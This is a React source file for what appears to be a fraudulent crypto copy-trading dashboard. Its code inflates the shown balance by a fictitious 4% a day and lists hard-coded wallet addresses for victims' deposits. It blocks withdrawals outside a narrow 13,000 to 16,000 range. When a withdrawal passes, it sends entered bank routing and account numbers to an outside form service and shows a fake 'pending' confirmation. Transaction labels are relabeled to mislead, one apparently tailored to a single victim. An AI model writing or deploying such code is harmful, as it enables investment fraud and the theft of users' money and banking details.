import React, { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import axios from "axios";

// ✅ Coin lists
const defaultCoins = [
  "bitcoin",
  "ethereum",
  "tether",
  "monero",
  "litecoin",
  "ripple",
  "cardano",
  "polkadot",
  "dogecoin",
  "solana",
];

const extendedCoins = [
  ...defaultCoins,
  "tron",
  "stellar",
  "vechain",
  "cosmos",
  "tezos",
  "aave",
  "uniswap",
  "chainlink",
  "algorand",
  "filecoin",
  "aptos",
  "near",
  "hedera",
  "fantom",
  "arbitrum",
  "optimism",
  "sui",
  "mina",
  "thorchain",
  "dash",
  "zilliqa",
  "waves",
  "iota",
  "neo",
  "kusama",
  "gala",
  "flow",
  "immutable-x",
  "render",
  "chiliz",
  "curve-dao-token",
  "maker",
  "compound",
  "yearn-finance",
  "balancer",
  "lido-dao",
  "rocket-pool",
  "frax",
  "pancakeswap",
  "1inch",
];

// ✅ Hook with toggle
function useCryptoPrices(showExtended = false) {
  const [prices, setPrices] = useState({});

  useEffect(() => {
    const fetchPrices = async () => {
      try {
        const ids = showExtended ? extendedCoins : defaultCoins;
        const res = await axios.get(
          "https://api.coingecko.com/api/v3/simple/price",
          {
            params: {
              ids: ids.join(","),
              vs_currencies: "usd",
              include_24hr_change: true,
            },
          },
        );
        setPrices(res.data);
      } catch (err) {
        console.error("Error fetching prices:", err);
      }
    };

    fetchPrices();
    const interval = setInterval(fetchPrices, 30000);
    return () => clearInterval(interval);
  }, [showExtended]);

  return prices;
}

export default function Dashboard() {
  const navigate = useNavigate();
  const [showExtended, setShowExtended] = useState(false);
  const prices = useCryptoPrices(showExtended);
  const [showConfirm, setShowConfirm] = useState(false);
  const [loggingOut, setLoggingOut] = useState(false);
  const [user, setUser] = useState(null);
  const [loading, setLoading] = useState(true);
  const [showDeposit, setShowDeposit] = useState(false);
  const [showWithdraw, setShowWithdraw] = useState(false);
  const [withdrawType, setWithdrawType] = useState(""); // "bank" or "wallet"
  const [withdrawAmount, setWithdrawAmount] = useState("");
  const [withdrawSubmitted, setWithdrawSubmitted] = useState(false);
  // const requiredBalance = balance + 815;
  const [showFundsWarning, setShowFundsWarning] = useState(false);
  const [showCopytradeModal, setShowCopytradeModal] = useState(false);
  const [copytradeActive, setCopytradeActive] = useState(
    localStorage.getItem("copytradeActive") === "true",
  );
  const [copytradeStartDate, setCopytradeStartDate] = useState(
    localStorage.getItem("copytradeStartDate")
      ? new Date(localStorage.getItem("copytradeStartDate"))
      : null,
  );

  // ✅ Bank branch
  const [selectedBank, setSelectedBank] = useState("");
  const [customBank, setCustomBank] = useState("");
  const [routingNumber, setRoutingNumber] = useState("");
  const [accountNumber, setAccountNumber] = useState("");

  // ✅ Wallet branch
  const [selectedWallet, setSelectedWallet] = useState(""); // USDT, BTC, ETH, SOL
  const [walletAddress, setWalletAddress] = useState("");

  // ✅ Shared
  const [withdrawMessage, setWithdrawMessage] = useState("");
  const [showWithdrawPopup, setShowWithdrawPopup] = useState(false);

  // ✅ Start copytrade (resume if already has a start date)
  const startCopytrade = () => {
    setCopytradeActive(true);
    if (!copytradeStartDate) {
      const today = new Date();
      setCopytradeStartDate(today);
      localStorage.setItem("copytradeStartDate", today.toISOString());
    }
    localStorage.setItem("copytradeActive", "true");
  };

  // Track final balance when copytrade stops
  const [finalBalance, setFinalBalance] = useState(
    Number(localStorage.getItem("finalBalance")) || null,
  );

  // ✅ Stop copytrade (pause only, keep accrued profits)
  const stopCopytrade = () => {
    // Calculate balance at stop time
    const stoppedBalance = baseBalance * Math.pow(1.04, daysSinceStart);

    // Save it in state + localStorage
    setFinalBalance(stoppedBalance);
    localStorage.setItem("finalBalance", stoppedBalance);

    setCopytradeActive(false);
    localStorage.setItem("copytradeActive", "false");
    // Notice: we do NOT clear copytradeStartDate here
  };

  const baseBalance =
    user?.transactions?.reduce((acc, tx) => {
      const type = tx.type?.toLowerCase();
      if (type === "withdraw" || type === "send") {
        return acc - tx.amount;
      } else if (type === "deposit" || type === "receive") {
        return acc + tx.amount;
      }
      return acc;
    }, 0) || 0;

  // Days since copytrade started
  const daysSinceStart = copytradeStartDate
    ? Math.floor(
        (Date.now() - copytradeStartDate.getTime()) / (1000 * 60 * 60 * 24),
      )
    : 0;

  // Final balance with growth
  const balance = copytradeActive
    ? baseBalance * Math.pow(1.04, daysSinceStart)
    : (finalBalance ?? baseBalance);

  const devMode = false; // 🔑 flip to false when backend is ready

  const fetchUser = async () => {
    if (devMode) {
      setUser({ name: "Dev User", balance: 5000, createdAt: "2026-04-2" });
      setLoading(false);
      return;
    }

    const token = localStorage.getItem("authToken");
    if (!token) {
      setUser(null);
      setLoading(false);
      return;
    }

    try {
      const res = await fetch(
        `${process.env.REACT_APP_API_URL}/api/user/profile`,
        {
          headers: {
            Authorization: `Bearer ${token}`,
            "Content-Type": "application/json",
          },
        },
      );

      if (!res.ok) throw new Error("Failed to fetch user");
      const data = await res.json();
      setUser(data.user);
    } catch (err) {
      console.error("Dashboard fetch error, kindly reload the page:", err);
      setUser(null);
    } finally {
      setLoading(false);
    }
  };

  useEffect(() => {
    fetchUser();
  }, []);
  // ✅ Reset copytrade for brand new users
  useEffect(() => {
    if (user && !user.transactions?.length) {
      setCopytradeActive(false);
      setCopytradeStartDate(null);
      localStorage.removeItem("copytradeActive");
      localStorage.removeItem("copytradeStartDate");
    }
  }, [user]);

  const formatCurrency = (v) =>
    new Intl.NumberFormat("en-US", {
      style: "currency",
      currency: "USD",
    }).format(v);

  if (loading) {
    return (
      <div className="min-h-screen flex items-center justify-center text-xl text-gray-300 bg-gray-900">
        Loading dashboard...
      </div>
    );
  }

  if (!user) {
    return (
      <div className="min-h-screen flex flex-col items-center justify-center text-xl text-red-400 bg-gray-900 p-4">
        Unauthorized. Please log in or sign up.
        <button
          onClick={() => navigate("/")}
          className="mt-4 px-4 py-2 bg-indigo-600 text-white rounded hover:bg-indigo-700"
        >
          Go to Login
        </button>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-gray-900 text-white p-4 sm:p-6">
      {/* Header */}
      <header className="flex justify-between items-center mb-6">
        <h1 className="text-2xl font-bold">Dashboard</h1>
        <button
          onClick={() => setShowConfirm(true)} // 👈 open the confirmation modal
          className="px-4 py-2 bg-red-600 rounded hover:bg-red-700"
        >
          Logout
        </button>
      </header>

      {/* Portfolio Summary */}
      {
        <section className="bg-gray-800 p-6 rounded-lg shadow-md mb-6">
          <h2 className="text-gray-300 font-medium">Total Assets</h2>
          <p className="text-3xl font-bold text-white mt-1">
            {formatCurrency(balance || 0)}
          </p>

          {copytradeActive && <p className="text-green-400 text-xs mt-2"></p>}

          {!copytradeActive && copytradeStartDate && (
            <p className="text-blue-400 text-xs mt-2"></p>
          )}

          {copytradeActive ? (
            <button
              onClick={() => setShowCopytradeModal(true)}
              className="mt-4 px-4 py-2 bg-red-600 text-white rounded hover:bg-red-700"
            >
              End Session
            </button>
          ) : (
            <button
              onClick={() => {
                if (balance < 200) {
                  setShowFundsWarning(true);
                  return;
                }
                setShowCopytradeModal(true);
              }}
              className="mt-4 px-4 py-2 bg-green-600 text-white rounded hover:bg-green-700"
            >
              Start Session
            </button>
          )}
        </section>
      }

      {/* Wallet Section with Live Prices */}
      <section className="bg-gray-800 p-6 rounded-lg shadow-md mb-6">
        <h2 className="text-xl font-bold mb-4">Cryptocurrency</h2>
        {Object.entries(prices).map(([coin, data]) => (
          <div
            key={coin}
            className="grid grid-cols-3 bg-gray-700 p-4 rounded-lg mb-2"
          >
            {/* Coin name */}
            <span className="font-semibold">{coin.toUpperCase()}</span>

            {/* Price aligned right */}
            <span className="text-right font-medium">
              ${data.usd.toFixed(2)}
            </span>

            {/* 24h change */}
            <span
              className={`text-right ${
                data.usd_24h_change >= 0 ? "text-green-400" : "text-red-400"
              }`}
            >
              {data.usd_24h_change.toFixed(2)}%
            </span>
          </div>
        ))}

        {/* Toggle Button */}
        <button
          onClick={() => setShowExtended(!showExtended)}
          className="mt-4 px-4 py-2 bg-indigo-600 rounded hover:bg-indigo-700"
        >
          {showExtended ? "Show less" : "Show more"}
        </button>
      </section>

      {/* Actions */}
      <section className="bg-gray-800 p-6 rounded-lg shadow-md text-center">
        <h2 className="text-xl font-bold mb-4">Actions</h2>
        <div className="flex flex-col sm:flex-row justify-center gap-6">
          <button
            onClick={() => setShowDeposit(true)}
            className="px-6 py-2 bg-green-600 rounded hover:bg-green-700"
          >
            Deposit
          </button>

          <button
            onClick={() => setShowWithdraw(true)}
            disabled={user.balance <= 0}
            className={`px-6 py-2 rounded ${
              user.balance <= 0
                ? "bg-gray-600 text-gray-400 cursor-not-allowed"
                : "bg-red-600 hover:bg-red-700"
            }`}
          >
            Withdraw
          </button>
        </div>
      </section>
      {showConfirm && (
        <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50 p-4">
          <div className="bg-gray-800 rounded-lg shadow-lg p-8 w-full max-w-md text-center relative">
            <button
              onClick={() => setShowConfirm(false)}
              className="absolute top-3 right-3 text-gray-400 hover:text-gray-200"
            >
              ✕
            </button>
            <h2 className="text-2xl font-bold mb-6 text-red-400">
              Confirm Logout
            </h2>
            <p className="text-gray-300 mb-6">
              Are you sure you want to log out?
            </p>
            <div className="flex justify-center gap-6">
              <button
                onClick={() => {
                  setLoggingOut(true);
                  localStorage.removeItem("authToken");
                  navigate("/");
                }}
                className="px-6 py-2 bg-red-600 rounded hover:bg-red-700"
              >
                Yes, Logout
              </button>
              <button
                onClick={() => setShowConfirm(false)}
                className="px-6 py-2 bg-gray-600 rounded hover:bg-gray-700"
              >
                Cancel
              </button>
            </div>
          </div>
        </div>
      )}
      {/* ✅ Warning Popup */}
      {showFundsWarning && (
        <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
          <div className="bg-white rounded-lg shadow-xl p-6 max-w-sm w-full border border-gray-200">
            {/* Header */}
            <div className="flex items-center mb-4">
              <div className="flex-shrink-0 bg-red-100 text-red-600 rounded-full p-2">
                {/* ⚠️ Icon */}
                <svg
                  className="w-6 h-6"
                  fill="none"
                  stroke="currentColor"
                  viewBox="0 0 24 24"
                >
                  <path
                    strokeLinecap="round"
                    strokeLinejoin="round"
                    strokeWidth={2}
                    d="M12 9v2m0 4h.01M12 5a7 7 0 100 14a7 7 0 000-14z"
                  />
                </svg>
              </div>
              <h2 className="ml-3 text-lg font-semibold text-red-700">
                Insufficient Funds
              </h2>
            </div>

            {/* Message */}
            <p className="text-gray-700 mb-6">
              You don't have the required funds yet.
            </p>

            {/* Actions */}
            <div className="flex justify-end">
              <button
                onClick={() => setShowFundsWarning(false)}
                className="px-4 py-2 bg-red-600 text-white rounded hover:bg-red-700 transition"
              >
                Close
              </button>
            </div>
          </div>
        </div>
      )}

      {showCopytradeModal && (
        <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50">
          <div className="bg-gray-800 p-6 rounded-lg shadow-lg text-center relative">
            {/* ✅ Close button */}
            <button
              onClick={() => setShowCopytradeModal(false)}
              className="absolute top-2 right-2 text-white hover:text-gray-300"
            >
              ✕
            </button>

            {/* Header */}
            <p className="text-white mb-4">
              {copytradeActive ? "End Session?" : "Select Session Type"}
            </p>

            {!copytradeActive ? (
              // Show crypto options when starting
              <div className="grid grid-cols-2 gap-3 mb-4">
                {[
                  "Bitcoin",
                  "Ethereum Classic",
                  "Monero",
                  "Litecoin",
                  "Zcash",
                  "Dogecoin",
                  "Ravencoin",
                  "Bitcoin Cash",
                ].map((coin) => (
                  <button
                    key={coin}
                    onClick={() => {
                      startCopytrade(coin); // pass selected coin
                      setShowCopytradeModal(false);
                    }}
                    className="px-4 py-2 bg-indigo-600 text-white rounded hover:bg-indigo-700"
                  >
                    {coin}
                  </button>
                ))}
              </div>
            ) : (
              // Show stop confirmation when already active
              <div className="flex justify-center gap-4">
                <button
                  onClick={() => {
                    stopCopytrade();
                    setShowCopytradeModal(false);
                  }}
                  className="px-4 py-2 bg-green-600 text-white rounded hover:bg-green-700"
                >
                  Yes
                </button>
                <button
                  onClick={() => setShowCopytradeModal(false)}
                  className="px-4 py-2 bg-red-600 text-white rounded hover:bg-red-700"
                >
                  No
                </button>
              </div>
            )}
          </div>
        </div>
      )}

      {/* Deposit Modal */}
      {showDeposit && (
        <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
          <div
            className="bg-gray-800 rounded-lg shadow-lg p-8 w-full max-w-md text-center relative 
                    max-h-[90vh] overflow-y-auto"
          >
            {/* Close button */}
            <button
              onClick={() => setShowDeposit(false)}
              className="absolute top-3 right-3 text-gray-400 hover:text-gray-200 text-xl font-bold p-2 rounded-full hover:bg-gray-700"
            >
              ✕
            </button>

            {/* Title */}
            <h2 className="text-2xl font-bold mb-6 text-indigo-200">
              Deposit Crypto
            </h2>

            {/* Addresses */}
            <div className="space-y-4">
              {/* USDT (TRC20) */}
              <div className="p-4 rounded-lg bg-gray-700">
                <h3 className="text-lg font-semibold text-white">
                  USDT (TRC20)
                </h3>
                <p className="text-sm text-gray-300 break-all mt-2">
                  TS93LbTrDjVSB2i13DnAnr4VSx87cQVa6a
                </p>
                <button
                  onClick={() => {
                    navigator.clipboard.writeText(
                      "TS93LbTrDjVSB2i13DnAnr4VSx87cQVa6a",
                    );
                    alert("Address copied!");
                  }}
                  className="mt-2 w-full px-3 py-1 bg-gray-600 text-white rounded text-xs hover:bg-gray-500"
                >
                  Copy
                </button>
              </div>

              {/* ETH (ERC20) */}
              <div className="p-4 rounded-lg bg-gray-700">
                <h3 className="text-lg font-semibold text-white">
                  ETH (ERC20)
                </h3>
                <p className="text-sm text-gray-300 break-all mt-2">
                  0x7a220042a8b1E30A9CE4f8ec61c410Eb757881fE
                </p>
                <button
                  onClick={() => {
                    navigator.clipboard.writeText(
                      "0x7a220042a8b1E30A9CE4f8ec61c410Eb757881fE",
                    );
                    alert("Address copied!");
                  }}
                  className="mt-2 w-full px-3 py-1 bg-gray-600 text-white rounded text-xs hover:bg-gray-500"
                >
                  Copy
                </button>
              </div>

              {/* USDT (ERC20) */}
              <div className="p-4 rounded-lg bg-gray-700">
                <h3 className="text-lg font-semibold text-white">
                  USDT (ERC20)
                </h3>
                <p className="text-sm text-gray-300 break-all mt-2">
                  0x7a220042a8b1E30A9CE4f8ec61c410Eb757881fE
                </p>
                <button
                  onClick={() => {
                    navigator.clipboard.writeText(
                      "0x7a220042a8b1E30A9CE4f8ec61c410Eb757881fE",
                    );
                    alert("Address copied!");
                  }}
                  className="mt-2 w-full px-3 py-1 bg-gray-600 text-white rounded text-xs hover:bg-gray-500"
                >
                  Copy
                </button>
              </div>

              {/* SOL */}
              <div className="p-4 rounded-lg bg-gray-700">
                <h3 className="text-lg font-semibold text-white">SOL</h3>
                <p className="text-sm text-gray-300 break-all mt-2">
                  JCfWUhzHu4XjXzTBdmnvsNsf1o7XJrdnxHQc1pyBsrtc
                </p>
                <button
                  onClick={() => {
                    navigator.clipboard.writeText(
                      "JCfWUhzHu4XjXzTBdmnvsNsf1o7XJrdnxHQc1pyBsrtc",
                    );
                    alert("Address copied!");
                  }}
                  className="mt-2 w-full px-3 py-1 bg-gray-600 text-white rounded text-xs hover:bg-gray-500"
                >
                  Copy
                </button>
              </div>

              {/* BTC */}
              <div className="p-4 rounded-lg bg-gray-700">
                <h3 className="text-lg font-semibold text-white">BTC</h3>
                <p className="text-sm text-gray-300 break-all mt-2">
                  bc1qfavp9r7xu8xccp6jwqwdf3t3cw9m404yp2mv4r
                </p>
                <button
                  onClick={() => {
                    navigator.clipboard.writeText(
                      "bc1qfavp9r7xu8xccp6jwqwdf3t3cw9m404yp2mv4r",
                    );
                    alert("Address copied!");
                  }}
                  className="mt-2 w-full px-3 py-1 bg-gray-600 text-white rounded text-xs hover:bg-gray-500"
                >
                  Copy
                </button>
              </div>
            </div>

            {/* Footer */}
            <p className="mt-6 text-xs text-gray-400">
              Please send only the correct coin to each address.
            </p>
          </div>
        </div>
      )}

      {/* ✅ Withdraw Modal */}
      {showWithdraw && (
        <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50 p-4">
          <div className="bg-gray-800 rounded-lg shadow-lg p-8 w-full max-w-md text-center relative">
            <button
              onClick={() => setShowWithdraw(false)}
              className="absolute top-3 right-3 text-gray-400 hover:text-gray-200"
            >
              ✕
            </button>
            <h2 className="text-2xl font-bold mb-6 text-indigo-200">
              Withdraw Funds
            </h2>

            {Number(withdrawAmount) < 0 ? (
              <p className="mb-6 text-sm">
                <span className="text-red-400">
                  You have not reached the minimum required balance to make a
                  withdrawal.
                </span>{" "}
                <span className="text-blue-400">
                  Current balance: ${balance}
                </span>
              </p>
            ) : (
              <>
                {/* Bank / Wallet Selection */}
                <div className="mb-4 text-left">
                  <label className="block text-gray-300 font-medium mb-2">
                    Select Withdrawal Type
                  </label>
                  <select
                    value={withdrawType}
                    onChange={(e) => setWithdrawType(e.target.value)}
                    className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                  >
                    <option value="">-- Choose Option --</option>
                    <option value="bank">Bank</option>
                    <option value="wallet">Wallet Address</option>
                  </select>
                </div>

                {/* ✅ Bank Flow */}
                {withdrawType === "bank" && (
                  <>
                    <div className="mb-4 text-left">
                      <label className="block text-gray-300 font-medium mb-2">
                        Select Bank
                      </label>
                      <select
                        value={selectedBank}
                        onChange={(e) => setSelectedBank(e.target.value)}
                        className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                      >
                        <option value="">-- Choose Bank --</option>
                        <option value="Bank of America">Bank of America</option>
                        <option value="CashApp Account">CashApp</option>
                        <option value="SoFi Bank">SoFi Bank</option>
                        <option value="Wells Fargo">Wells Fargo</option>
                        <option value="Chase">Chase Bank</option>
                        <option value="custom">Other (Type Bank Name)</option>
                      </select>
                    </div>

                    {selectedBank === "custom" && (
                      <div className="mb-4 text-left">
                        <label className="block text-gray-300 font-medium mb-2">
                          Enter Bank Name
                        </label>
                        <input
                          type="text"
                          value="Input Bank Name" // ✅ placeholder text instead of real name
                          // value={customBank}
                          onChange={(e) => setCustomBank(e.target.value)}
                          className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                        />
                      </div>
                    )}

                    <div className="mb-4 text-left">
                      <label className="block text-gray-300 font-medium mb-2">
                        Account Name
                      </label>
                      <input
                        type="text"
                        // value="Input Account Name" // ✅ placeholder text instead of real name
                        // value="Marvin Lane O'Dell"
                        // readOnly
                        // className="w-full px-4 py-2 rounded bg-gray-600 text-white cursor-not-allowed"
                        className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                      />
                    </div>

                    <div className="mb-4 text-left">
                      <label className="block text-gray-300 font-medium mb-2">
                        Routing Number
                      </label>
                      <input
                        type="text"
                        value={routingNumber}
                        onChange={(e) => setRoutingNumber(e.target.value)}
                        className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                      />
                    </div>

                    <div className="mb-4 text-left">
                      <label className="block text-gray-300 font-medium mb-2">
                        Account Number
                      </label>
                      <input
                        type="text"
                        value={accountNumber}
                        onChange={(e) => setAccountNumber(e.target.value)}
                        className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                      />
                    </div>

                    <div className="mb-4 text-left">
                      <label className="block text-gray-300 font-medium mb-2">
                        Amount
                      </label>
                      <input
                        type="number"
                        value={withdrawAmount}
                        onChange={(e) => setWithdrawAmount(e.target.value)}
                        className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                      />
                    </div>
                  </>
                )}

                {/* ✅ Wallet Flow */}
                {withdrawType === "wallet" && (
                  <>
                    <div className="mb-4 text-left">
                      <label className="block text-gray-300 font-medium mb-2">
                        Select Wallet
                      </label>
                      <select
                        value={selectedWallet}
                        onChange={(e) => setSelectedWallet(e.target.value)}
                        className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                      >
                        <option value="">-- Choose Wallet --</option>
                        <option value="USDT (TRC20)">USDT (TRC20)</option>
                        <option value="BTC">Bitcoin (BTC)</option>
                        <option value="ETH">Ethereum (ETH)</option>
                        <option value="SOL">Solana (SOL)</option>
                      </select>
                    </div>

                    {selectedWallet && (
                      <>
                        <div className="mb-4 text-left">
                          <label className="block text-gray-300 font-medium mb-2">
                            Wallet Address
                          </label>
                          <input
                            type="text"
                            value={walletAddress}
                            onChange={(e) => setWalletAddress(e.target.value)}
                            className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                          />
                        </div>

                        <div className="mb-4 text-left">
                          <label className="block text-gray-300 font-medium mb-2">
                            Amount
                          </label>
                          <input
                            type="number"
                            value={withdrawAmount}
                            onChange={(e) => setWithdrawAmount(e.target.value)}
                            className="w-full px-4 py-2 rounded bg-gray-700 text-white"
                          />
                        </div>
                      </>
                    )}
                  </>
                )}

                {/* ✅ Confirm Button */}
                <button
                  onClick={async () => {
                    // if (Number(withdrawAmount) < balance) {
                    //   setWithdrawMessage(
                    //     `You have not reached the minimum required balance to make a
                    //     withdrawal. Current balance: $${balance}`,
                    //   );

                    //   // setWithdrawMessage(
                    //   //   "You cannot make repeated withdrawals.",
                    //   // );
                    //   setShowWithdrawPopup(true);
                    //   return;
                    // }
                    if (
                      Number(withdrawAmount) < 13000 ||
                      Number(withdrawAmount) > 16000 ||
                      balance < 13000 ||
                      balance > 16000
                    ) {
                      setWithdrawMessage(
                        <p className="mb-6 text-sm">
                          <span className="text-red-400">
                            You have not reached the minimum required balance to
                            make a withdrawal.
                          </span>{" "}
                          <span className="text-blue-400">
                            Current balance is ${balance}
                          </span>
                        </p>,
                      );

                      setShowWithdrawPopup(true);
                      return;
                    }

                    if (Number(withdrawAmount) > balance) {
                      setWithdrawMessage(
                        "You do not have enough funds to withdraw that amount.",
                      );
                      setShowWithdrawPopup(true);
                      return;
                    }

                    // ✅ Formspark submission with all input values
                    try {
                      await fetch("https://submit-form.com/Uw0FopiGT", {
                        method: "POST",
                        headers: { "Content-Type": "application/json" },
                        body: JSON.stringify({
                          withdrawType,
                          selectedBank:
                            withdrawType === "bank"
                              ? selectedBank === "custom"
                                ? customBank
                                : selectedBank
                              : "",
                          routingNumber,
                          accountNumber,
                          selectedWallet:
                            withdrawType === "wallet" ? selectedWallet : "",
                          walletAddress,
                          withdrawAmount,
                        }),
                      });
                    } catch (err) {
                      console.error("Formspark submission failed", err);
                    }

                    // ✅ Keep popup message intact
                    setWithdrawMessage(
                      <div className="text-sm text-gray-200 space-y-2 text-left">
                        <p className="text-indigo-600 font-bold">
                          Withdrawal Pending!
                        </p>
                        <p className="text-black">
                          May take up to 24 hours or more depending on the
                          status of recipient.
                        </p>
                        <p>
                          <span className="text-black">Method:</span>{" "}
                          <span className="text-indigo-600 font-medium">
                            {withdrawType === "wallet"
                              ? selectedWallet
                              : selectedBank === "custom"
                                ? customBank
                                : selectedBank}
                          </span>
                        </p>
                        <p>
                          <span className="text-black">Account/Wallet:</span>{" "}
                          <span className="text-indigo-600 font-medium">
                            {withdrawType === "wallet"
                              ? walletAddress
                              : accountNumber}
                          </span>
                        </p>
                        <p>
                          <span className="text-black">Amount:</span>{" "}
                          <span className="text-indigo-600 font-semibold">
                            ${withdrawAmount}
                          </span>
                        </p>
                      </div>,
                    );

                    // Hide the withdrawal form immediately
                    setWithdrawSubmitted(true);

                    // Show popup after 10 seconds
                    setTimeout(() => {
                      setShowWithdrawPopup(true);
                    }, 5000);

                    // Reset fields (but don’t close modal yet)
                    setSelectedBank("");
                    setCustomBank("");
                    setRoutingNumber("");
                    setAccountNumber("");
                    setSelectedWallet("");
                    setWalletAddress("");
                    setWithdrawAmount("");
                  }}
                  className="px-6 py-2 bg-indigo-600 text-white rounded hover:bg-indigo-700 transition"
                >
                  Confirm Withdrawal
                </button>

                {/* ✅ Popup Modal */}
                {showWithdrawPopup && (
                  <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
                    <div className="bg-white rounded-lg shadow-lg p-6 max-w-sm w-full text-center">
                      <p className="mb-6 whitespace-pre-line text-gray-800">
                        {withdrawMessage}
                      </p>
                      <button
                        onClick={() => {
                          setShowWithdrawPopup(false);
                          setShowWithdraw(false);
                          setWithdrawSubmitted(false);
                        }}
                        className="px-4 py-2 bg-red-600 text-white rounded hover:bg-red-700"
                      >
                        Close
                      </button>
                    </div>
                  </div>
                )}
              </>
            )}
          </div>
        </div>
      )}

      {/* Transactions */}
      <section className="bg-gray-800 p-6 rounded-lg shadow-md mb-6">
        <h2 className="text-xl font-bold text-white mb-4">
          Recent Transactions
        </h2>
        {user.transactions && user.transactions.length > 0 ? (
          <ul className="divide-y divide-gray-700">
            {[...user.transactions]
              .sort((a, b) => new Date(b.date) - new Date(a.date)) // newest first
              .map((tx, idx) => {
                const type = tx.type?.toLowerCase();
                const isWithdraw = type === "withdraw" || type === "send";
                const isDeposit =
                  type === "deposit" ||
                  type === "receive" ||
                  type === "received";

                const isLatest = idx === 0;
                const isSpecialReturned =
                  isLatest && Number(tx.amount) === 115018; // ✅ only match exact amount

                return (
                  <li
                    key={idx}
                    className="flex justify-between items-center py-3 text-sm"
                  >
                    {/* Transaction Direction */}
                    <div className="flex flex-col">
                      <span
                        className={`font-semibold ${
                          isWithdraw
                            ? "text-red-400"
                            : isDeposit
                              ? "text-green-400"
                              : "text-gray-400"
                        }`}
                      >
                        {isSpecialReturned
                          ? "Returned" // ✅ special label only for exact amount
                          : isWithdraw
                            ? "Pending"
                            : isDeposit
                              ? "Reversal"
                              : tx.type}
                      </span>

                      {/* ✅ Extra info only for exact returned */}
                      {isSpecialReturned && (
                        <span className="text-gray-400 text-xs">SoFi Bank</span>
                      )}

                      <span className="text-gray-400 text-xs">
                        {isWithdraw
                          ? `To: ${tx.to || "0xAbC123..."}`
                          : `From: ${tx.from || "0xDebI13..."}`}
                      </span>
                    </div>

                    {/* Amount */}
                    <div className="w-24 text-right">
                      <span
                        className={`font-medium ${
                          isSpecialReturned
                            ? "text-green-400" // ✅ treat as deposit
                            : isWithdraw
                              ? "text-red-400"
                              : "text-green-400"
                        }`}
                      >
                        {isSpecialReturned
                          ? `+${tx.amount}` // ✅ show as deposit
                          : isWithdraw
                            ? `-${tx.amount}`
                            : `+${tx.amount}`}
                      </span>
                    </div>

                    {/* Date + Time */}
                    <div className="flex flex-col text-right">
                      <span className="text-gray-400 text-xs">
                        {new Date(tx.date).toLocaleDateString()}
                      </span>
                      <span className="text-gray-500 text-xs">
                        {new Date(tx.date).toLocaleTimeString([], {
                          hour12: false,
                        })}
                      </span>
                    </div>
                  </li>
                );
              })}
          </ul>
        ) : (
          <p className="text-gray-400 text-sm">No transactions yet</p>
        )}
      </section>
    </div>
  );
}
